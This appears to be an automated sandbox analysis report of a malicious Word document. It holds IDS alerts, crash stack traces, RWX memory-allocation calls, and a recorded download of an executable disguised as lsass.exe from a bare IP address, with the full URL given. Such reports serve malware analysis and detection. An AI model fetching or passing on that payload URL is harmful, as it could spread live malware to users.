TCP 34.192.83.212:443 -> 192.168.56.101:49238 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49281 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49431 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49238 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49410 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49410 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49457 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49457 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49184 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49184 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49332 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49332 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49425 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49425 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49313 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49313 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49259 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49259 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49178 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49178 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49413 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49187 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49413 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49187 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49280 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49280 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49215 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49215 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49370 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49268 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49370 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49268 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49266 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49411 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49266 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49411 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49186 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49186 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49393 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49393 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49242 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49242 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49309 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49309 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49232 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49232 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49464 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49464 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49307 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49307 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49168 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49168 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49176 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49176 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 67.207.166.175:80 -> 192.168.56.101:49164 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 67.207.166.175:80 -> 192.168.56.101:49164 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 67.207.166.175:80 -> 192.168.56.101:49164 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

__exception__

 stacktrace: 
RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x75c5374b
DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x747ff725
NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x75c6414b
WdtpInterfacePointer_UserUnmarshal+0x166b DllDebugObjectRPCHook-0x2d8d ole32+0x13c8e2 @ 0x747fc8e2
CoRegisterMessageFilter+0x32b4 ObjectStublessClient5-0x1db5 ole32+0x398ad @ 0x746f98ad
OleCreateEmbeddingHelper+0x2a1 CreateFileMoniker-0x17de ole32+0x81414 @ 0x74741414
ObjectStublessClient31+0x6af8 STGMEDIUM_UserUnmarshal-0x22bb6 ole32+0x97b68 @ 0x74757b68
wdGetApplicationObject+0x131f9 wdCommandDispatch-0x4c476 wwlib+0x394dff @ 0x72124dff
DllCanUnloadNow+0xbaf5e wwlib+0x9692a0 @ 0x726f92a0
DllCanUnloadNow+0x339ef0 wwlib+0xbe8232 @ 0x72978232
DllCanUnloadNow+0x54e0c9 wwlib+0xdfc40b @ 0x72b8c40b
DllCanUnloadNow+0x55865b wwlib+0xe0699d @ 0x72b9699d
DllCanUnloadNow+0x33bec4 wwlib+0xbea206 @ 0x7297a206
DllCanUnloadNow+0xbd684 wwlib+0x96b9c6 @ 0x726fb9c6
DllCanUnloadNow+0x215f8 wwlib+0x8cf93a @ 0x7265f93a
DllGetClassObject+0x2d9ac DllGetLCID-0x22ded4 wwlib+0x325f6 @ 0x71dc25f6
DllGetClassObject+0x5b213 DllGetLCID-0x20066d wwlib+0x5fe5d @ 0x71defe5d
DllGetClassObject+0x5a904 DllGetLCID-0x200f7c wwlib+0x5f54e @ 0x71def54e
DllCanUnloadNow+0x3200d6 wwlib+0xbce418 @ 0x7295e418
DllCanUnloadNow+0x2d334c wwlib+0xb8168e @ 0x7291168e
DllGetClassObject+0x157e7 DllGetLCID-0x246099 wwlib+0x1a431 @ 0x71daa431
DllGetClassObject+0x3b23 DllGetLCID-0x257d5d wwlib+0x876d @ 0x71d9876d
FMain+0x482 DllGetClassObject-0x266 wwlib+0x49e4 @ 0x71d949e4
wdCommandDispatch-0x2ed winword+0x15d7 @ 0x2f3315d7
wdCommandDispatch-0x367 winword+0x155d @ 0x2f33155d
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0x800706be
exception.offset: 46887
exception.address: 0x7597b727
registers.esp: 3362340
registers.edi: 1953561104
registers.eax: 3362340
registers.ebp: 3362420
registers.edx: 0
registers.ebx: 6176556
registers.esi: 2147944126
registers.ecx: 2841257112
1 0 0

__exception__

 stacktrace: 
RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x75c5374b
DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x747ff725
NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x75c6414b
WdtpInterfacePointer_UserUnmarshal+0x166b DllDebugObjectRPCHook-0x2d8d ole32+0x13c8e2 @ 0x747fc8e2
CoRegisterMessageFilter+0x32b4 ObjectStublessClient5-0x1db5 ole32+0x398ad @ 0x746f98ad
CoRegisterMessageFilter+0x5048 ObjectStublessClient5-0x21 ole32+0x3b641 @ 0x746fb641
CoRegisterMessageFilter+0x4ff4 ObjectStublessClient5-0x75 ole32+0x3b5ed @ 0x746fb5ed
CoRegisterMessageFilter+0x4b79 ObjectStublessClient5-0x4f0 ole32+0x3b172 @ 0x746fb172
CoRegisterMessageFilter+0x4075 ObjectStublessClient5-0xff4 ole32+0x3a66e @ 0x746fa66e
ObjectStublessClient31+0x2961c STGMEDIUM_UserUnmarshal-0x92 ole32+0xba68c @ 0x7477a68c
ObjectStublessClient31+0x6776 STGMEDIUM_UserUnmarshal-0x22f38 ole32+0x977e6 @ 0x747577e6
OleCreateEmbeddingHelper+0x344 CreateFileMoniker-0x173b ole32+0x814b7 @ 0x747414b7
ObjectStublessClient31+0x6af8 STGMEDIUM_UserUnmarshal-0x22bb6 ole32+0x97b68 @ 0x74757b68
wdGetApplicationObject+0x131f9 wdCommandDispatch-0x4c476 wwlib+0x394dff @ 0x72124dff
DllCanUnloadNow+0xbaf5e wwlib+0x9692a0 @ 0x726f92a0
DllCanUnloadNow+0x339ef0 wwlib+0xbe8232 @ 0x72978232
DllCanUnloadNow+0x54e0c9 wwlib+0xdfc40b @ 0x72b8c40b
DllCanUnloadNow+0x55865b wwlib+0xe0699d @ 0x72b9699d
DllCanUnloadNow+0x33bec4 wwlib+0xbea206 @ 0x7297a206
DllCanUnloadNow+0xbd684 wwlib+0x96b9c6 @ 0x726fb9c6
DllCanUnloadNow+0x215f8 wwlib+0x8cf93a @ 0x7265f93a
DllGetClassObject+0x2d9ac DllGetLCID-0x22ded4 wwlib+0x325f6 @ 0x71dc25f6
DllGetClassObject+0x5b213 DllGetLCID-0x20066d wwlib+0x5fe5d @ 0x71defe5d
DllGetClassObject+0x5a904 DllGetLCID-0x200f7c wwlib+0x5f54e @ 0x71def54e
DllCanUnloadNow+0x3200d6 wwlib+0xbce418 @ 0x7295e418
DllCanUnloadNow+0x2d334c wwlib+0xb8168e @ 0x7291168e
DllGetClassObject+0x157e7 DllGetLCID-0x246099 wwlib+0x1a431 @ 0x71daa431
DllGetClassObject+0x3b23 DllGetLCID-0x257d5d wwlib+0x876d @ 0x71d9876d
FMain+0x482 DllGetClassObject-0x266 wwlib+0x49e4 @ 0x71d949e4
wdCommandDispatch-0x2ed winword+0x15d7 @ 0x2f3315d7
wdCommandDispatch-0x367 winword+0x155d @ 0x2f33155d
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0x800706ba
exception.offset: 46887
exception.address: 0x7597b727
registers.esp: 3362032
registers.edi: 1953561104
registers.eax: 3362032
registers.ebp: 3362112
registers.edx: 0
registers.ebx: 6176772
registers.esi: 2147944122
registers.ecx: 2841257112
1 0 0
suspicious_features Connection to IP address suspicious_request GET http://67.207.166.175/T0406W/lsass.exe
request GET http://67.207.166.175/T0406W/lsass.exe
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

 process_identifier: 2544
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x65001000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2544
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6b001000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2544
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05860000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2544
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05860000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2544
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05870000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2544
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05880000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2544
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6ad61000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2544
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6ad64000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2544
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x507c1000
process_handle: 0xffffffff
1 0 0
Application Crash Process WINWORD.EXE with pid 2544 crashed
Time & API Arguments Status Return Repeated

__exception__

 stacktrace: 
RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x75c5374b
DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x747ff725
NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x75c6414b
WdtpInterfacePointer_UserUnmarshal+0x166b DllDebugObjectRPCHook-0x2d8d ole32+0x13c8e2 @ 0x747fc8e2
CoRegisterMessageFilter+0x32b4 ObjectStublessClient5-0x1db5 ole32+0x398ad @ 0x746f98ad
OleCreateEmbeddingHelper+0x2a1 CreateFileMoniker-0x17de ole32+0x81414 @ 0x74741414
ObjectStublessClient31+0x6af8 STGMEDIUM_UserUnmarshal-0x22bb6 ole32+0x97b68 @ 0x74757b68
wdGetApplicationObject+0x131f9 wdCommandDispatch-0x4c476 wwlib+0x394dff @ 0x72124dff
DllCanUnloadNow+0xbaf5e wwlib+0x9692a0 @ 0x726f92a0
DllCanUnloadNow+0x339ef0 wwlib+0xbe8232 @ 0x72978232
DllCanUnloadNow+0x54e0c9 wwlib+0xdfc40b @ 0x72b8c40b
DllCanUnloadNow+0x55865b wwlib+0xe0699d @ 0x72b9699d
DllCanUnloadNow+0x33bec4 wwlib+0xbea206 @ 0x7297a206
DllCanUnloadNow+0xbd684 wwlib+0x96b9c6 @ 0x726fb9c6
DllCanUnloadNow+0x215f8 wwlib+0x8cf93a @ 0x7265f93a
DllGetClassObject+0x2d9ac DllGetLCID-0x22ded4 wwlib+0x325f6 @ 0x71dc25f6
DllGetClassObject+0x5b213 DllGetLCID-0x20066d wwlib+0x5fe5d @ 0x71defe5d
DllGetClassObject+0x5a904 DllGetLCID-0x200f7c wwlib+0x5f54e @ 0x71def54e
DllCanUnloadNow+0x3200d6 wwlib+0xbce418 @ 0x7295e418
DllCanUnloadNow+0x2d334c wwlib+0xb8168e @ 0x7291168e
DllGetClassObject+0x157e7 DllGetLCID-0x246099 wwlib+0x1a431 @ 0x71daa431
DllGetClassObject+0x3b23 DllGetLCID-0x257d5d wwlib+0x876d @ 0x71d9876d
FMain+0x482 DllGetClassObject-0x266 wwlib+0x49e4 @ 0x71d949e4
wdCommandDispatch-0x2ed winword+0x15d7 @ 0x2f3315d7
wdCommandDispatch-0x367 winword+0x155d @ 0x2f33155d
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0x800706be
exception.offset: 46887
exception.address: 0x7597b727
registers.esp: 3362340
registers.edi: 1953561104
registers.eax: 3362340
registers.ebp: 3362420
registers.edx: 0
registers.ebx: 6176556
registers.esi: 2147944126
registers.ecx: 2841257112
1 0 0

__exception__

 stacktrace: 
RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x75c5374b
DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x747ff725
NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x75c6414b
WdtpInterfacePointer_UserUnmarshal+0x166b DllDebugObjectRPCHook-0x2d8d ole32+0x13c8e2 @ 0x747fc8e2
CoRegisterMessageFilter+0x32b4 ObjectStublessClient5-0x1db5 ole32+0x398ad @ 0x746f98ad
CoRegisterMessageFilter+0x5048 ObjectStublessClient5-0x21 ole32+0x3b641 @ 0x746fb641
CoRegisterMessageFilter+0x4ff4 ObjectStublessClient5-0x75 ole32+0x3b5ed @ 0x746fb5ed
CoRegisterMessageFilter+0x4b79 ObjectStublessClient5-0x4f0 ole32+0x3b172 @ 0x746fb172
CoRegisterMessageFilter+0x4075 ObjectStublessClient5-0xff4 ole32+0x3a66e @ 0x746fa66e
ObjectStublessClient31+0x2961c STGMEDIUM_UserUnmarshal-0x92 ole32+0xba68c @ 0x7477a68c
ObjectStublessClient31+0x6776 STGMEDIUM_UserUnmarshal-0x22f38 ole32+0x977e6 @ 0x747577e6
OleCreateEmbeddingHelper+0x344 CreateFileMoniker-0x173b ole32+0x814b7 @ 0x747414b7
ObjectStublessClient31+0x6af8 STGMEDIUM_UserUnmarshal-0x22bb6 ole32+0x97b68 @ 0x74757b68
wdGetApplicationObject+0x131f9 wdCommandDispatch-0x4c476 wwlib+0x394dff @ 0x72124dff
DllCanUnloadNow+0xbaf5e wwlib+0x9692a0 @ 0x726f92a0
DllCanUnloadNow+0x339ef0 wwlib+0xbe8232 @ 0x72978232
DllCanUnloadNow+0x54e0c9 wwlib+0xdfc40b @ 0x72b8c40b
DllCanUnloadNow+0x55865b wwlib+0xe0699d @ 0x72b9699d
DllCanUnloadNow+0x33bec4 wwlib+0xbea206 @ 0x7297a206
DllCanUnloadNow+0xbd684 wwlib+0x96b9c6 @ 0x726fb9c6
DllCanUnloadNow+0x215f8 wwlib+0x8cf93a @ 0x7265f93a
DllGetClassObject+0x2d9ac DllGetLCID-0x22ded4 wwlib+0x325f6 @ 0x71dc25f6
DllGetClassObject+0x5b213 DllGetLCID-0x20066d wwlib+0x5fe5d @ 0x71defe5d
DllGetClassObject+0x5a904 DllGetLCID-0x200f7c wwlib+0x5f54e @ 0x71def54e
DllCanUnloadNow+0x3200d6 wwlib+0xbce418 @ 0x7295e418
DllCanUnloadNow+0x2d334c wwlib+0xb8168e @ 0x7291168e
DllGetClassObject+0x157e7 DllGetLCID-0x246099 wwlib+0x1a431 @ 0x71daa431
DllGetClassObject+0x3b23 DllGetLCID-0x257d5d wwlib+0x876d @ 0x71d9876d
FMain+0x482 DllGetClassObject-0x266 wwlib+0x49e4 @ 0x71d949e4
wdCommandDispatch-0x2ed winword+0x15d7 @ 0x2f3315d7
wdCommandDispatch-0x367 winword+0x155d @ 0x2f33155d
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0x800706ba
exception.offset: 46887
exception.address: 0x7597b727
registers.esp: 3362032
registers.edi: 1953561104
registers.eax: 3362032
registers.ebp: 3362112
registers.edx: 0
registers.ebx: 6176772
registers.esi: 2147944122
registers.ecx: 2841257112
1 0 0
file C:\Users\test22\AppData\Local\Temp\~$onsarekingogthejunglewhorulestheentireforestandlionsgreattounderstandtheyaregreattoundersetandlionsarekindofthejungle__lionsarekingofjungle.doc
Time & API Arguments Status Return Repeated

NtCreateFile

 create_disposition: 5 (FILE_OVERWRITE_IF)
file_handle: 0x000003ec
filepath: C:\Users\test22\AppData\Local\Temp\~$onsarekingogthejunglewhorulestheentireforestandlionsgreattounderstandtheyaregreattoundersetandlionsarekindofthejungle__lionsarekingofjungle.doc
desired_access: 0x40100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\C:\Users\test22\AppData\Local\Temp\~$onsarekingogthejunglewhorulestheentireforestandlionsgreattounderstandtheyaregreattoundersetandlionsarekindofthejungle__lionsarekingofjungle.doc
create_options: 4194400 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
status_info: 2 (FILE_CREATED)
share_access: 0 ()
1 0 0
host 67.207.166.175